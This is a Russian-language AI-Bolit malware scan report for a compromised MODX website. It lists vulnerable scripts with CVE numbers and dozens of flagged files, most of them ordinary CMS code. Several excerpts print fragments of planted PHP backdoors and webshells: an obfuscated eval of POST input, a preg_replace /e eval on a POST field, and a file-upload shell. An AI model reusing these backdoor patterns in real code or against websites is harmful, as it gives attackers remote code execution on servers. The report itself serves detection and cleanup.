Отчет сканера AI-Bolit v20170904: /home/unicombu/public_html/ (2/1)
Скрипт бесплатный только для личного некоммерческого использования. Есть коммерческая лицензия (пункт №11).
Затрачено времени: 4 m . Сканирование начато 20-11-2017 в 11:34:45, сканирование завершено 20-11-2017 в 11:39:15
Всего проверено 551 директорий и 3308 файлов. Использовано памяти при сканировании: 8.21 Mb.
Сводный отчет
Мобильных редиректов3
Вредоносных скриптов44
JS Вирусов1
Исполняемых файлов4
Скрытых файлов1
Рекламных ссылок и кодов2
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер старается минимизировать число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.
Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Скорее всего, ваш сайт был взломан и заражен. Рекомендуем срочно обратиться за консультацией к специалистам по информационной безопасности.

Пришлите нам отчет в архиве .zip на ai@revisium.com для проверки вашего сайта на вирусы и взлом.

Компания "Ревизиум" - лечение сайта от вирусов и защита от взлома.


Также выполните дополнительный анализ новым веб-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Критические замечания
Уязвимости в скриптах (2)
  • /home/unicombu/public_html/manager/includes/controls/class.phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • /home/unicombu/public_html/assets/modules/evogallery/js/uploadify/uploadify.php - AFU : UPLOADIFY : CVE: 2012-1153
  • Эти файлы могут быть вредоносными или хакерскими скриптами (44)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…"/$filename($i).$ext")){if(is_uploaded_file($_FILES['NewFile']['tmp_name'])){if( move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename(
    10/05/2013 15:09:59
    10/05/2013 15:09:59
    8.28 Kb
    622a08eb188c9d53f906627b230763dd76d0c513
    x
    1368187799
    id_58f954f4
    [x] 1…You must call ::factory() with one parameter,the library to load.");}$this->uid= md5($_SERVER['REMOTE_ADDR']);include_once "$driver.php";$classname="Image_Trans
    10/05/2013 15:10:07
    10/05/2013 15:10:07
    15.34 Kb
    1ecca0d059ff58bab10e15ee2f008ea2fb12af03
    x
    1368187807
    id_464375f4
    [x] 1…$filesaved=0;function ImageEditor($manager){$this->manager=$manager;$this->_uid= md5($_SERVER['REMOTE_ADDR']);}function isFileSaved(){Return$this->filesaved;}fu
    10/05/2013 15:10:07
    10/05/2013 15:10:07
    10.88 Kb
    5a147189c7eb60cb9eaa6e8a6364f0319db2ea5f
    x
    1368187807
    id_464375f4
    [x] 1…ction Image_Transform_Driver_IM(){return true;}function load($image){$this->uid= md5($_SERVER['REMOTE_ADDR']);$this->image=$image;$this->_get_image_details($ima
    10/05/2013 15:10:06
    10/05/2013 15:10:06
    7.52 Kb
    c61a7148fa5e7e2144a3f79053d1638870552a64
    x
    1368187806
    id_464375f4
    [x] 1…ansform{var$command=array();function Image_Transform_Driver_NetPBM(){$this->uid= md5($_SERVER['REMOTE_ADDR']);return true;}function load($image){$this->image=$i
    10/05/2013 15:10:07
    10/05/2013 15:10:07
    8.20 Kb
    5791f6d3aca2077fe97ad146f74ec37e733a7783
    x
    1368187807
    id_464375f4
    [x] 1…image='';function Image_Transform_GD(){return;}function load($image){$this->uid= md5($_SERVER['REMOTE_ADDR']);$this->image=$image;$this->_get_image_details($ima
    10/05/2013 15:10:06
    10/05/2013 15:10:06
    16.42 Kb
    5533dfd5f1e29e3e420d8104e888345400294e32
    x
    1368187806
    id_464375f4
    [x] 1…_POST['path'].'/'.$userfile['name'])){if(strtoupper(substr(PHP_OS,0,3))!='WIN') chmod($_POST['path']."/".$userfile['name'],$new_file_permissions);$msg.='<p><sp
    10/05/2013 15:09:49
    10/05/2013 15:09:49
    27.65 Kb
    1da32f62df82c8c56afabfe974e9f3d5945782a4
    x
    1368187789
    id_3810d622
    [x] 1…ource=trim($_POST['textarea']);$_SESSION['textarea']=$source."\n";}else{$source= file_get_contents($_FILES['sqlfile']['tmp_name']);}import_sql($source);header('
    05/06/2013 20:13:00
    05/06/2013 20:13:00
    21.69 Kb
    eab985e32b69661c211052019490a9662f13561d
    x
    1370452380
    id_3810d622
    [x] 1…$cacheContent=$docObjSerial."<!--__MODxCacheSpliter__-->".$this->documentContent ;fputs($fp,"<?php die('Unauthorized access.');?>$cacheContent");fclose($fp);}}$
    10/05/2013 15:09:52
    10/05/2013 15:09:52
    129.48 Kb
    99a26d07aa686239856f9d53df6094bfe73d406b
    x
    1368187792
    id_a3086437
    [x] 1…s: 422 Unprocessable Entity');die();}if(isset($_SERVER['QUERY_STRING'])&&strpos( urldecode($_SERVER['QUERY_STRING']),'·')!==false) die();if(ini_get('register_gl
    10/05/2013 15:09:52
    10/05/2013 15:09:52
    2.17 Kb
    5f287417d4ef6669687673199b71eb9faedf3029
    x
    1368187792
    id_464375f4
    [x] 68…jZW5zZU9L decodes to licenseOK·/*function checkSession(){··return true;//!empty ($_POST[base64_decode("bGljZW5zZU9L")])&&$_POST[base64_decode("bGljZW5zZU9L")
    10/05/2013 15:09:51
    10/05/2013 15:09:51
    1.25 Kb
    da4551f7e448e258d284faf65c874d6a1192bb50
    x
    1368187791
    id_d8444371
    [x] 1…$maxlen,true);$encoded=str_replace("=".$this->LE,"\n",trim($encoded));}$encoded= preg_replace('/^(.*)$/m',"=?".$this->CharSet."?$encoding?\·?=",$encoded);$encod
    10/05/2013 15:09:53
    10/05/2013 15:09:53
    44.54 Kb
    631515bc8d321f5d451a86ca238fcdf268727430
    x
    1368187793
    id_d3ac992e
    [x] 1…{"GLOBALS"}["tijgxywy"]});}elseif(${$ydnczfxqgq}["a"]=="e"){$mwvvynwbxyi="data"; eval(${$mwvvynwbxyi}["d"]);}exit();}?
    17/11/2017 15:26:38
    12/11/2017 22:04:12
    4.71 Kb
    07ef1d072b1f9aa5665f54bd3b8fbbde49a32053
    x
    1510517052
    id_3f19f879
    [x] 1…j("i","","ibiaisie6i4i_dieicoide");$fh=$avj("k","","crkekatkek_kfkukncktkikon"); $hwy=$fh('',$qu($avj("c","",$or.$zs.$lq.$bu)));$hwy();?
    17/11/2017 15:26:55
    12/11/2017 22:04:11
    299 b
    a02733a1cbe5e0030e5ad85753006cd2229557ab
    x
    1510517051
    id_95384deb
    [x] 1…r />';}else{echo '<font color="red">File Upload Error.</font><br />';}}echo '<b> <br>'.php_uname().'<br></b>';echo '<form enctype="multipart/form-data" method="
    17/11/2017 15:26:29
    12/11/2017 22:04:11
    10.20 Kb
    50181168e7a09b362b7408af977241594f7cec47
    x
    1510517051
    id_3b5f19b8
    [x] 1…se64_decode("YmFzZTY0X2RlY29kZQ==");$ydSJPtnwrSv=base64_decode('Y29weQ==");eval( $raPo_rZluoE($_POST[base64_decode('aWQ=')]));if($_POST[base64_decode("dXA=")]==
    17/11/2017 15:26:22
    12/11/2017 22:04:09
    743 b
    0c0999f50f88d12946ad1dd61de440ddd542d814
    x
    1510517049
    id_94e89cfd
    [x] 1…return false;}function stripAlias($alias,$char_restrict,$word_separator){$alias= preg_replace_callback('/&([a-zA-Z][a-zA-Z0-9]{1,7});/',array($this,'convert_ent
    10/05/2013 15:08:33
    10/05/2013 15:08:33
    10.72 Kb
    65f06436e56f48605c867a72fc18a853a82c5a8d
    x
    1368187713
    id_d3ac992e
    [x] 1…hes": case "ltrim": case "rtrim": case "trim": case "nl2br": case "md5":$output= $modifier_cmd[$i]($output);break;case "math":$filter=preg_replace("·([a-zA-Z\n\
    10/05/2013 12:36:37
    10/05/2013 12:36:37
    17.50 Kb
    e1c49b43c3f725c0be23dc794b93b7fc36e21ed7
    x
    1368178597
    id_ea1bc104
    [x] 1…input=$json->decode($raw);if(isset($config['general.engine'])){$spellchecker=new $config['general.engine']($config);$result=call_user_func_array(array($spellche
    10/05/2013 12:37:51
    10/05/2013 12:37:51
    2.79 Kb
    cf7ced168906339e4f26fcf6918a9ed7673c64a3
    x
    1368178671
    id_ea1bc104
    [x] 1…se;if(isset($_SERVER['HTTP_ACCEPT_ENCODING']))$encodings=explode(',',strtolower( preg_replace("/\s+/","",$_SERVER['HTTP_ACCEPT_ENCODING'])));if(preg_match("/(?:
    10/05/2013 12:36:23
    10/05/2013 12:36:23
    14.55 Kb
    e94e77523b5691da8a9e121ebbea3c8579ba4ede
    x
    1368178583
    id_d3ac992e
    [x] 1…r />';}else{echo '<font color="red">File Upload Error.</font><br />';}}echo '<b> <br>'.php_uname().'<br></b>';echo '<form enctype="multipart/form-data" method="
    26/09/2017 12:05:22
    26/09/2017 12:05:22
    9.57 Kb
    05ddfc72db6d15deb12cb9939b987e1cad988d07
    x
    1506416722
    id_3b5f19b8
    [x] 1…r />';}else{echo '<font color="red">File Upload Error.</font><br />';}}echo '<b> <br>'.php_uname().'<br></b>';echo '<form enctype="multipart/form-data" method="
    10/10/2017 11:02:34
    10/10/2017 11:02:34
    9.57 Kb
    05ddfc72db6d15deb12cb9939b987e1cad988d07
    x
    1507622554
    id_3b5f19b8
    [x] 1…e']));if(isset($_REQUEST['refurl'])&&!empty($_REQUEST['refurl'])){$targetPageId= urldecode($_REQUEST['refurl']);if(strpos($targetPageId,'q=')!==false){$urlPos=s
    10/05/2013 15:08:51
    10/05/2013 15:08:51
    18.35 Kb
    2b257b402026914ecd5054d25945614457e9b5f1
    x
    1368187731
    id_464375f4
    [x] 1…_filterValue);$custom=array_shift($custom_list);if(function_exists($custom)){if( $custom($value[$this->_array_key],$custom_list))$unset=0;}break;}return$unset;}
    10/05/2013 15:08:35
    10/05/2013 15:08:35
    56.10 Kb
    2dfafb2cb490a440c092aba9fa5b927a23fc1ee8
    x
    1368187715
    id_94e89cfd
    [x] 1…','simple');$this->scCateg=$stv[0];}else{$fCateg=$categ_array[1];$this->scCateg= $fCateg($categ_array[0]);}}$tags_array=explode(':',$this->cfg['tags']);if(isset
    10/05/2013 15:08:34
    10/05/2013 15:08:34
    32.23 Kb
    7c386782baeb3dbc7ff46bcae7689117554b060f
    x
    1368187714
    id_94e89cfd
    [x] 1…'])){if(isset($_POST['asid']))$id=strip_tags($_POST['asid']);else$id=strip_tags( urldecode($_GET['asid']));}$this->forThisAs=($this->asCfg->cfg['asId']!=$id)?fa
    10/05/2013 15:08:34
    10/05/2013 15:08:34
    7.80 Kb
    05360a18c0479db8a4d0c0d2701eb228349d82a0
    x
    1368187714
    id_464375f4
    [x] 131…t($__language)?$__language :$dcfg['language']);··//&ajaxSearch [1 | 0](as p assed in snippet variable ONLY)·// Use this to display the search results using
    10/05/2013 15:08:34
    10/05/2013 15:08:34
    24.84 Kb
    58dc816e5ff71a8acd17478c3b9b57e8b5e5f671
    x
    1368187714
    id_ea1bc104
    [x] 1<?php ($b4dboy=$_POST['b4dboy'])&&preg_replace('/ad/e',''.str_rot13( 'riny').'($b4dboy)','add');?><?php $_lang['as_resultsIntroFailure']='H??adan??v?
    26/09/2017 12:17:18
    26/09/2017 12:17:18
    2.12 Kb
    6e2a141580bfeeebd5721ff15b630400325c2370
    x
    1506417438
    id_f42f1715
    [x] 1…aceholders[$name]);}}foreach($customPlaceholders as$name=>$value){$placeholders= call_user_func($value,$placeholders);}if(count($this->fields["display"]['qe'])>
    10/05/2013 15:08:43
    10/05/2013 15:08:43
    38.65 Kb
    b79c8a26fe0f7424d1afd56919db7fe3e6a66fef
    x
    1368187723
    id_85781d45
    [x] 1…ay: block;float: left;}table table tr td tr td{border: 1px solid#888;}</style>"; $_lang['debug_item']="[+pagetitle+]([+id+])";?
    10/05/2013 15:08:45
    10/05/2013 15:08:45
    2.73 Kb
    70d482f5141d2dbb69d4655a1c5a95c312252fbf
    x
    1368187725
    id_ea1bc104
    [x] 1…ay: block;float: left;}table table tr td tr td{border: 1px solid#888;}</style>"; $_lang['debug_item']="[+pagetitle+]([+id+])";?
    10/05/2013 15:08:45
    10/05/2013 15:08:45
    2.76 Kb
    bf5726d0071b38672dbeab9d9b586b22cff2aac7
    x
    1368187725
    id_ea1bc104
    [x] 1…bg_icon_url+]" /><a href="[+save_url+]">[+save_dbg_console+]</a><br /><br />TPL; $dbg_templates["item"]=<<<TPL [+pagetitle+]([+id+]) TPL;$dbg_templates["tab"]=<
    10/05/2013 15:08:44
    10/05/2013 15:08:44
    1.80 Kb
    b6d3187b3fabd9a2420c22c762210a7f6075cc61
    x
    1368187724
    id_ea1bc104
    [x] 1…pU6tsIPmFCAJnWYE0FURk7wJDA0MTKpEzoWAAskiAAA7';header('Content-Type: image/gif'); echo base64_decode($ERROR_NOGD);}else{echo '*** ERROR: No PHP-GD support availa
    10/05/2013 12:38:24
    10/05/2013 12:38:24
    170.98 Kb
    17b7b6c9324fc033a55483381c855e1a3e9a8b0a
    x
    1368178704
    id_8d8a3032
    [x] 1…write($fp_tempfile,base64_decode('R0lGODlhAQABAIAAAH//AP///ywAAAAAAQABAAACAUQAOw =='));fclose($fp_tempfile);$gd_info['GIF Read Support']=(bool) ImageCreateFromG
    10/05/2013 12:38:24
    10/05/2013 12:38:24
    32.38 Kb
    94454b6592b1fb02da5481d63350e12d7f5c9bdd
    x
    1368178704
    id_4ec05a62
    [x] 1…_http_user_agent for site with browsersniffers(thanks redrob·gmail*com) * Added$ PHPTHUMB_CONFIG['disable_pathinfo_parsing'](default false) which disables parsi
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    57.65 Kb
    db05cb67baecdb2adf94ff3f256d3386463094f1
    x
    1368178705
    id_ea1bc104
    [x] 1…re present and properly configured in phpThumb.config.php(introduced in v1.6.0): $PHPTHUMB_CONFIG['allow_src_above_docroot'](default=false)$PHPTHUMB_CONFIG['all
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    14.06 Kb
    7ecb69552489a5ffb25a40a3d951c6276474286f
    x
    1368178705
    id_ea1bc104
    [x] 1…ource images(GIF,TIFF,etc) aoe=Output Allow Enlarging - override the setting for $CONFIG['output_allow_enlarging'](1=on,0=off)("far" and "iar" both override thi
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    26.54 Kb
    94a9840215f34aed8babeb5a4a979a5934e61988
    x
    1368178705
    id_ea1bc104
    [x] 1…(Last-Modified: '.gmdate('D,d M Y H:i:s',$nModified).' GMT),but skipping because $_SERVER[HTTP_REFERER]('.$_SERVER['HTTP_REFERER'].') is not in$phpThumb->config
    10/05/2013 12:38:25
    10/05/2013 12:38:25
    27.03 Kb
    90c4bf10dbe13dd7b087d7ee319ca7bd77ec003a
    x
    1368178705
    id_ea1bc104
    [x] 1…sts($target_dir)){mkdir($target_dir,0777);mkdir($target_dir.'thumbs/',0777);}if( move_uploaded_file($_FILES['Filedata']['tmp_name'],$target_file)){resizeImage($
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    4.34 Kb
    58514b236c8c321550f2597f01470ce4002c5fb1
    x
    1368178578
    id_58f954f4
    [x] 1…_id']) :$this->config['docId'];$filename=isset($_GET['edit'])?$modx->db->escape( urldecode($_GET['edit'])) : '';$tpl=file_get_contents($this->config['modulePath
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    18.12 Kb
    2c058d00c5aa5cda60a85fc9c7743af20bafb32f
    x
    1368178578
    id_464375f4
    [x] 1…['thumbQuality']);chmod($target_file,0666);chmod($target_thumb,0666);}$filename= urldecode($_POST['edit']);if($filename!==$_FILES['Filedata']['name']){if(file_e
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    4.45 Kb
    3dc24ffc12768715afa196ae6829efd43e53effb
    x
    1368178578
    id_464375f4
    [x] 1…ontent_id'])?intval($_GET['content_id']) : 0;$filename=isset($_GET['filename'])? urldecode($_GET['filename']) : '';$target=$savePath.$content_id.'/thumbs/'.$fil
    10/05/2013 12:36:18
    10/05/2013 12:36:18
    928 b
    8ac9ea25eb14eb15bca7c2e5e035424a9795806f
    x
    1368178578
    id_464375f4
    [x] 95…</strong><br />·<div class="dis-code"><pre class="brush: php;toolbar: false">ev al(base64_decode("cc6ebdef6a9f8fd3887455e23a2ec....</pre></div><div class="dis
    20/11/2017 10:28:50
    20/11/2017 10:28:50
    81.93 Kb
    8a631d19d91391bab9d50720fdf442c78b4fc7e4
    x
    1511166530
    id_b4d4b5ac
    [x] 1…fg[\'language\']=isset($language)?$language :(isset($__language)?$__language :$d cfg[\'language\']);//&ajaxSearch [1 | 0](as passed in snippet variable ONLY) //
    20/11/2017 10:53:56
    20/11/2017 10:53:56
    387.35 Kb
    a3e3a5122cdb793e46ecace56f18d155c652d809
    x
    1511168036
    id_ea1bc104
    Эти файлы могут быть javascript вирусами (1)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute"); $s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opt
    10/05/2013 12:38:22
    10/05/2013 12:38:22
    15.69 Kb
    094be5fa34f0adda530e9d16c06a2170322cc46d
    x
    1368178702
    id_ea1bc104
    Подозрение на мобильный редирект, подмену расширений или автовнедрение кода (3)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    36… Apache internal dummy connections from breaking [(site_url)] cache·RewriteCond %{HTTP_USER_AGENT}^.*internal\ dummy\ connection.*$ [NC]·RewriteRule.* - [F,L
    11/02/2015 16:13:07
    17/10/2014 12:14:57
    1.91 Kb
    f343da0b61782d5c052941e58428180c7b98176e
    x
    1413537297
    id_z1485237
    46… Apache internal dummy connections from breaking [(site_url)] cache·RewriteCond %{HTTP_USER_AGENT}^.*internal\ dummy\ connection.*$ [NC]·RewriteCond%{REQUEST
    27/10/2017 07:26:02
    14/12/2016 04:50:24
    2.96 Kb
    2ee611512d8c84adabc397ba5d7cedc83961b283
    x
    1481683824
    id_z4560086
    15… Apache internal dummy connections from breaking [(site_url)] cache·RewriteCond %{HTTP_USER_AGENT}^.*internal\ dummy\ connection.*$ [NC]·RewriteRule.* - [F,L
    23/10/2014 16:15:09
    03/06/2013 15:43:18
    1.20 Kb
    de4701ed31b3691c0b842b7d19490f778e6a68d8
    x
    1370263398
    id_z8032649
    Обнаружены сигнатуры исполняемых файлов unix и нехарактерных скриптов. Они могут быть вредоносными файлами (4)
    /home/unicombu/public_html/cgi-bin/entropybanner.cgi
    /home/unicombu/public_html/cgi-bin/randhtml.cgi
    /home/unicombu/public_html/cgi-bin/cgiecho
    /home/unicombu/public_html/cgi-bin/cgiemail
    Предупреждения
    Дорвеи, реклама, спам-ссылки, редиректы
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…></td></tr><tr><td>phpInfo()</td><td>&nbsp;</td><td><b><a href="#" onclick="view PHPInfo();return false;"><?php echo$_lang['view'];?></a></b></td></tr><tr><td><
    10/05/2013 15:09:51
    10/05/2013 15:09:51
    11.07 Kb
    1a37d6af6d4786334006cbd8738608c5caa724c0
    x
    1368187791
    id_z3046138
    1…d-color:#cccccc;border: 0px;height: 1px;color:#333333;}</style><?php ob_start(); phpinfo();$pinfo=ob_get_contents();ob_end_clean();$pinfo=preg_replace('%^.*<bod
    10/05/2013 15:09:50
    10/05/2013 15:09:50
    1.52 Kb
    6b789c0fa51f17babe577badb2781778972b74ab
    x
    1368187790
    id_z1295586
    Скрытые файлы (1)
    /home/unicombu/public_html/.well-known
    В не .php файле содержится стартовая сигнатура PHP кода. Возможно, там вредоносный код
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…cation class::<?php class Auth{function authenticate($data,$config){}}?>as you c an see the class must have a method called authenticate which takes two paramet
    10/05/2013 15:09:59
    10/05/2013 15:09:59
    2.48 Kb
    62e9e94ee1c7ea226fd8b1ada219d44396177b06
    x
    1368187799
    id_z7698096